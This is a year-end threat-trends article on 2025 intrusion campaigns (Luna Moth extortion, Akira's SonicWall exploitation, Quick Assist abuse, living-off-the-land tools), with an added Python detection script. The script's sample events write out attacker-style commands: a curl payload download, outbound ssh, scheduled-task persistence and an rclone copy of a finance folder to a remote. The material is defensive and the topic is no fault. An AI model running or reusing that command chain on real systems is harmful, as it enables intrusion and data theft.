As 2025 draws to a close, the cybersecurity community is taking stock of a year defined more by the relentless refinement of old tactics than by novel malware. Threat actors did not reinvent cybercrime this year—they optimized it. Social engineering became more convincing, infrastructure vulnerabilities more consequential, and legitimate tools more dangerous when placed in the wrong hands.
According to a year-end threat trends analysis compiled by Stroz Friedberg, now part of LevelBlue, attackers throughout 2025 consistently blended human manipulation with technical exploitation. Coordinated campaigns targeting U.S.-based organizations relied on impersonation, remote access abuse, and the exploitation of widely deployed VPN and firewall technologies. The result was a threat environment where traditional perimeter defenses proved increasingly inadequate.
LevelBlue investigators identified sustained activity from well-known threat groups, including Luna Moth and Akira, alongside a sharp increase in attacks leveraging trusted enterprise tools such as Microsoft Quick Assist. Across these campaigns, a common pattern emerged: gain trust first, access systems second, and only then deploy malware or ransomware.
Social Engineering as the Primary Entry Point
In the first half of 2025, LevelBlue’s Incident Readiness and Response team observed a notable shift toward stealthy, human-centric intrusion methods. Rather than relying solely on exploit kits or brute-force attacks, threat actors increasingly impersonated internal IT staff, abused collaboration platforms, and even recruited individuals to secure legitimate IT roles inside target organizations.
These tactics consistently exploited human error and organizational trust, allowing attackers to bypass traditional security controls and remain undetected for extended periods. Three dominant trends shaped this activity throughout the year.
Luna Moth: Data Theft and Extortion Without Ransomware
The Luna Moth threat actor group remained highly active in 2025, particularly against professional services organizations such as law firms and financial institutions. LevelBlue linked Luna Moth to numerous data-theft incidents, followed by aggressive extortion campaigns.
Luna Moth attacks typically began with phishing emails impersonating internal IT or security personnel. Victims were instructed to call a fraudulent help desk number, where attackers posed as support staff and directed them to install legitimate remote access tools, such as Zoho Assist or Atera. Once access was granted, attackers exfiltrated sensitive data using tools such as WinSCP or by renaming files with Rclone.
Rather than deploying ransomware, Luna Moth relied on sustained harassment—repeated phone calls and emails pressuring victims to pay in exchange for non-disclosure of stolen data. LevelBlue’s investigations revealed a consistent attack chain: phishing and impersonation led to remote access, data theft, and extortion, underscoring how effective low-noise tactics can be when paired with social engineering.
Akira: VPN Exploitation and Malware at Scale
Akira was the most frequently observed threat actor in LevelBlue investigations during 2025, appearing nearly three times as often as the next most prevalent group. Two distinct trends defined Akira’s operations: exploitation of SonicWall firewall vulnerabilities and widespread deployment of Bumblebee malware.
Akira affiliates exploited two critical SonicWall flaws to gain initial access. CVE-2024-40766, disclosed in 2024, stemmed from improper access controls during firewall migrations, while CVE-2024-53704, published in January 2025, allowed authentication bypass of SSL VPN components. Both vulnerabilities enabled attackers to bypass MFA and establish persistent access to victim networks.
Once inside, Akira frequently escalated attacks by delivering Bumblebee malware via SEO poisoning. Victims searching for legitimate IT utilities were redirected to spoofed domains hosting trojanized installers. Executing these files deployed Bumblebee, enabling credential harvesting, lateral movement, data exfiltration, and ultimately the deployment of Akira ransomware to encrypt critical systems.
Quick Assist and Teams: Trust Turned Into a Weapon
A third major trend involved the abuse of Microsoft Quick Assist in sophisticated social engineering campaigns. These attacks often began with voice calls or Microsoft Teams messages from compromised external accounts, sometimes preceded by email bombing to create urgency and confusion.
Victims were led to believe they were receiving legitimate internal IT support and were instructed to launch Quick Assist and share device access. Because Quick Assist runs with the privileges of the logged-in user, attackers effectively inherited those permissions.
Post-compromise activity followed a methodical pattern. Threat actors conducted extensive reconnaissance using built-in Windows commands to enumerate systems, domains, and trust relationships. They established covert outbound connections using the legitimate Windows SSH client and retrieved additional tools via curl. Persistence was maintained through scheduled tasks, registry modifications, and WMI event subscriptions, with remote access tools such as ScreenConnect and AnyDesk used to sustain control. In some cases, attackers culminated operations by deploying ransomware, including Black Basta.
The Vulnerabilities That Mattered Most
Across all campaigns, the most frequently exploited vulnerabilities in 2025 targeted network intermediary devices—particularly firewalls and SSL VPN gateways. SonicWall flaws dominated investigations, but other critical issues also played a significant role.
Zero-day vulnerabilities in FortiOS, FortiProxy, and Ivanti Connect Secure enabled attackers to bypass authentication and execute remote code. Meanwhile, a critical flaw in SAP NetWeaver Visual Composer enabled arbitrary file uploads and code execution, resulting in the deployment of reverse shells, web shells, and other malware.
These vulnerabilities consistently enabled attackers to bypass MFA, persist within environments, and evade detection—often for weeks or months.
Living Off the Land Becomes the Norm
Rather than introducing new malware, attackers increasingly relied on tools already present in enterprise environments. LevelBlue observed widespread abuse of legitimate file transfer utilities, remote access software, network scanners, and command-line tools. By “living off the land,” threat actors significantly reduced their visibility to traditional endpoint detection and response platforms.
Commonly observed tools included Rclone and WinSCP for data exfiltration, Quick Assist and AnyDesk for remote access, and utilities such as PsExec, OpenSSH, and curl for command execution and lateral movement. Even standard productivity software, including Microsoft Outlook, contributed to social engineering campaigns.
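The post-compromise chain described in the Quick Assist section (remote-access session, built-in reconnaissance commands, outbound ssh and curl, scheduled-task, registry or WMI persistence) and the living-off-the-land tool list in this section are what a behavioral detection has to correlate, since none of the individual binaries is malicious on its own. The following Python is an added example, not code from LevelBlue, Stroz Friedberg or the article: it classifies process-creation events into stages and raises a finding only when a remote-access tool launch is followed on the same host, within a time window, by further stages. The process image names, the sample hosts, paths, command lines and timestamps are all assumptions constructed for this example.

```python
"""Correlate Windows process-creation events into the remote-access-tool to
living-off-the-land pattern (Quick Assist/AnyDesk session, then built-in recon,
ssh/curl, scheduled-task/registry/WMI persistence, Rclone/WinSCP transfer).
Added example: the events are CONSTRUCTED and the binary names are assumptions
based on common Windows tool names, not values taken from the article."""
from collections import defaultdict
from datetime import datetime, timedelta

# (stage, process image basenames, command-line substrings of which at least one
# must appear, or None when the image alone is enough). Names are assumed.
RULES = [
    ("remote_access", {"quickassist.exe", "anydesk.exe", "screenconnect.clientservice.exe"}, None),
    ("recon", {"whoami.exe", "nltest.exe", "net.exe", "net1.exe", "systeminfo.exe", "ipconfig.exe"}, None),
    ("outbound", {"ssh.exe", "curl.exe"}, None),
    ("persistence", {"schtasks.exe"}, ("/create",)),
    ("persistence", {"reg.exe"}, ("\\run",)),  # CurrentVersion\Run keys
    ("persistence", {"powershell.exe"}, ("register-wmievent", "__eventfilter", "commandlineeventconsumer")),
    ("exfil", {"rclone.exe", "winscp.exe"}, None),
]


def classify(event):
    """Return the set of stages a single process-creation event matches."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"].lower()
    return {stage for stage, images, needles in RULES
            if image in images and (needles is None or any(n in cmd for n in needles))}


def correlate(events, window=timedelta(hours=4)):
    """Per host: the first remote-access tool launch opens a window, and later
    stages on that host inside it are attached. A session with no follow-on
    stage is not reported, because help-desk use of these tools is legitimate."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host[ev["host"]].append(ev)
    findings = {}
    for host, evs in by_host.items():
        anchor, stages = None, defaultdict(list)
        for ev in evs:
            tags = classify(ev)
            if "remote_access" in tags and anchor is None:
                anchor = ev["time"]
            if anchor is None or ev["time"] - anchor > window:
                continue  # no session yet, or outside the window (tuning decision)
            for tag in tags:
                stages[tag].append(ev)
        extra = len(stages) - 1  # stages beyond the remote-access anchor
        if anchor is None or extra < 1:
            continue
        findings[host] = {
            "severity": "high" if extra >= 3 else "medium" if extra == 2 else "low",
            "stages": sorted(stages),
            "first_seen": anchor.isoformat(),
            "events": sum(len(v) for v in stages.values()),
        }
    return findings


def _ev(host, when, image, cmdline):
    return {"host": host, "time": datetime.fromisoformat(when), "image": image, "cmdline": cmdline}


# Constructed sample: WS01 follows the full chain, WS02 is a benign support
# session, WS03 is an administrator creating a task with no remote-access anchor.
SAMPLE_EVENTS = [
    _ev("WS01", "2025-11-03T09:00:00", r"C:\Apps\QuickAssist.exe", "QuickAssist.exe"),
    _ev("WS01", "2025-11-03T09:05:00", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _ev("WS01", "2025-11-03T09:06:00", r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    _ev("WS01", "2025-11-03T09:10:00", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe -N ops@203.0.113.10"),
    _ev("WS01", "2025-11-03T09:12:00", r"C:\Windows\System32\curl.exe", r"curl.exe -o C:\Users\Public\svc.exe https://files.example/svc.exe"),
    _ev("WS01", "2025-11-03T09:20:00", r"C:\Windows\System32\schtasks.exe", r"schtasks /create /tn Updater /tr C:\Users\Public\svc.exe /sc onlogon"),
    _ev("WS01", "2025-11-03T09:40:00", r"C:\Users\Public\AnyDesk.exe", "AnyDesk.exe"),
    _ev("WS01", "2025-11-03T11:15:00", r"C:\Users\Public\rclone.exe", r"rclone.exe copy C:\Finance remote:drop"),
    _ev("WS02", "2025-11-03T10:00:00", r"C:\Apps\QuickAssist.exe", "QuickAssist.exe"),
    _ev("WS02", "2025-11-03T10:03:00", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    _ev("WS03", "2025-11-03T08:30:00", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    _ev("WS03", "2025-11-03T08:35:00", r"C:\Windows\System32\schtasks.exe", r"schtasks /create /tn Backup /tr C:\Scripts\backup.cmd /sc daily"),
]


def sample_findings(window_hours=4):
    """Run the correlation over the constructed sample with a given window."""
    return correlate(SAMPLE_EVENTS, window=timedelta(hours=window_hours))


if __name__ == "__main__":
    for host, f in sample_findings().items():
        print(host, f["severity"], ", ".join(f["stages"]), f"({f['events']} events from {f['first_seen']})")
```

Running the block prints a high-severity finding for WS01 (all five stages), a low-severity one for WS02, and nothing for WS03, since the recon and scheduled task there have no remote-access session in front of them. The window is anchored to the first remote-access launch, which keeps the example short; in production the window length is a tuning decision (a one-hour window would drop the Rclone transfer on WS01), and the remote_access rule would be extended with the client binaries of whatever support tools the organization actually allows, so that an unexpected tool is itself a signal.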
Looking Ahead to 2026
The defining lesson of 2025 is clear: attackers are winning not by outpacing technology, but by outmaneuvering people. Social engineering, impersonation, and trusted tool abuse proved more effective than zero-days alone, allowing threat actors to bypass layered defenses with alarming consistency.
As organizations look to 2026, LevelBlue warns that traditional heuristic-based detection will be insufficient. Defenders must prioritize behavioral detection, identity-aware controls, and continuous monitoring of trusted tools and access pathways. The threats of tomorrow will look familiar—but they will arrive wearing a far more convincing disguise.
